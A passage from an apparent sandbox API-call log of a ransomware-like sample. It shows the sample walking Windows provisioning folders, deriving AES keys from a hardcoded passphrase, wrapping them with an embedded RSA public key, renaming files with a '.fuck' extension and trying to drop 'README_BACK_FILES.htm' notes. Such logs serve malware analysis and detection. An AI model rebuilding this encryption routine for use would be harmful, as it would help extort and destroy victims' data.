Algorithm.Parameters.pbData=0x28c7a28*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7a30*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e84b8) returned 1 [0240.235] CryptEncrypt (in: hKey=0x28e84b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.235] CryptEncrypt (in: hKey=0x28e84b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f60a0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f60a0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.235] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f60a0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.235] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.235] CryptEncrypt (in: hKey=0x28e89b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.236] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.236] CloseHandle (hObject=0xffffffff) returned 1 [0240.236] CloseHandle (hObject=0xffffffff) returned 1 [0240.236] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0240.236] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0240.236] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0240.237] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0240.237] CryptDestroyHash (hHash=0x28e8638) returned 1 [0240.237] CryptDestroyKey (hKey=0x28e89b8) returned 1 [0240.237] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0240.237] FindNextFileA (in: hFindFile=0x28e8478, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.237] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.237] GetLastError () returned 0x5 [0240.237] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0240.238] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0240.238] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.238] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.238] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.239] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6c50) returned 1 [0240.241] CryptCreateHash (in: hProv=0x28f6c50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.241] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.241] CryptHashData (hHash=0x28e89b8, pbData=0x27e2538, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.241] CryptDeriveKey (in: hProv=0x28f6c50, Algid=0x6610, hBaseData=0x28e89b8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e89f8) returned 1 [0240.241] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.241] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.241] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f6d60) returned 1 [0240.241] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6d60, dwCertEncodingType=0x1, pInfo=0x28c87c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c87f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8800*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e8538) returned 1 [0240.241] CryptEncrypt (in: hKey=0x28e8538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.241] CryptEncrypt (in: hKey=0x28e8538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6810*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f6810*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.241] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6810, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.242] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.242] CryptEncrypt (in: hKey=0x28e89f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.242] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.242] CloseHandle (hObject=0xffffffff) returned 1 [0240.242] CloseHandle (hObject=0xffffffff) returned 1 [0240.242] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0240.242] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0240.242] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0240.243] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0240.243] CryptDestroyHash (hHash=0x28e89b8) returned 1 [0240.243] CryptDestroyKey (hKey=0x28e89f8) returned 1 [0240.243] CryptReleaseContext (hProv=0x28f6c50, dwFlags=0x0) returned 1 [0240.243] FindNextFileA (in: hFindFile=0x28e8478, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0240.243] FindClose (in: hFindFile=0x28e8478 | out: hFindFile=0x28e8478) returned 1 [0240.243] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0240.243] AreFileApisANSI () returned 1 [0240.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0240.244] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.244] GetLastError () returned 0x5 [0240.244] GetLastError () returned 0x5 [0240.244] FindNextFileA (in: hFindFile=0x28e8438, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.244] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.244] GetLastError () returned 0x5 [0240.244] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml")) returned 0x20 [0240.244] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0240.245] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.245] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.246] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.246] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6f80) returned 1 [0240.248] CryptCreateHash (in: hProv=0x28f6f80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.248] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.248] CryptHashData (hHash=0x28e89f8, pbData=0x27e22b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.248] CryptDeriveKey (in: hProv=0x28f6f80, Algid=0x6610, hBaseData=0x28e89f8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e85b8) returned 1 [0240.248] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.248] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.248] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f6c50) returned 1 [0240.249] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6c50, dwCertEncodingType=0x1, pInfo=0x28c76b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c76e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c76f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e8478) returned 1 [0240.249] CryptEncrypt (in: hKey=0x28e8478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.249] CryptEncrypt (in: hKey=0x28e8478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6898*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f6898*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.249] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6898, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.249] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.249] CryptEncrypt (in: hKey=0x28e85b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.249] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.249] CloseHandle (hObject=0xffffffff) returned 1 [0240.249] CloseHandle (hObject=0xffffffff) returned 1 [0240.249] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0240.249] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0240.250] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.gsg")) returned 0 [0240.250] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.fuck")) returned 0 [0240.250] CryptDestroyHash (hHash=0x28e89f8) returned 1 [0240.250] CryptDestroyKey (hKey=0x28e85b8) returned 1 [0240.250] CryptReleaseContext (hProv=0x28f6f80, dwFlags=0x0) returned 1 [0240.250] FindNextFileA (in: hFindFile=0x28e8438, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.251] FindClose (in: hFindFile=0x28e8438 | out: hFindFile=0x28e8438) returned 1 [0240.251] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\readme_back_files.htm")) returned 0xffffffff [0240.251] AreFileApisANSI () returned 1 [0240.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0240.251] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.251] GetLastError () returned 0x5 [0240.251] GetLastError () returned 0x5 [0240.251] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.251] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0240.252] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\readme_back_files.htm")) returned 0xffffffff [0240.252] AreFileApisANSI () returned 1 [0240.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0240.252] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.252] GetLastError () returned 0x5 [0240.252] GetLastError () returned 0x5 [0240.252] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.252] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e88b8 [0240.252] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.252] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.253] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.253] GetLastError () returned 0x5 [0240.253] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml")) returned 0x20 [0240.253] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0240.253] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.253] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.254] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.254] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f6920) returned 1 [0240.256] CryptCreateHash (in: hProv=0x28f6920, Algid=0x8003, hKey=0x0, dwFlags=0x0, 